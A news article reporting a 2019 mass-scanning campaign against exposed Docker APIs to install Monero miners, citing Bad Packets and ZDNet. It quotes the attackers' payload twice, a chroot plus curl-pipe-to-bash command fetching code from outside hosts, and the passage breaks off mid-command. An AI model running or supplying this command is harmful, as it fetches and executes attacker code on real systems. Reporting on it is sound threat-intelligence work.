Cryptocurrency News Today: Hackers mass-scan for Docker vulnerability to mine Monero cryptocurrency
A hacking group is reportedly performing a mass-scan of the internet in search of vulnerable ports on systems using enterprise sandbox software Docker to mine Cryptocurrency.
According to security researchers at Bad Packets, the scans, which began over the weekend, identify vulnerabilities that allow bad actors to inject malicious code that deploys a Cryptocurrency miner on a company’s Docker instances, ZDNet reports.
Opportunistic mass scanning activity detected targeting exposed Docker API endpoints.
These scans create a container using an Alpine Linux image, and execute the payload via:
“Command”: “chroot /mnt /bin/sh -c ‘curl -sL4 https://t.co/q047bRPUyj | bash;'”,#threatintel pic.twitter.com/vxszV5SF1o
— Bad Packets Report (@bad_packets) November 25, 2019
Troy Mursch, chief researcher and co-founder of Bad Packets, told ZDNet this type of activity is quite common. However, this campaign was unique because of its size.
Researchers are yet to get to grips with the entire scope of the campaign. However, as it stands, the attack is scanning over 59,000 IP networks looking for vulnerable Docker instances.
When an exposed instance is found, the below line of code is run.
chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | ba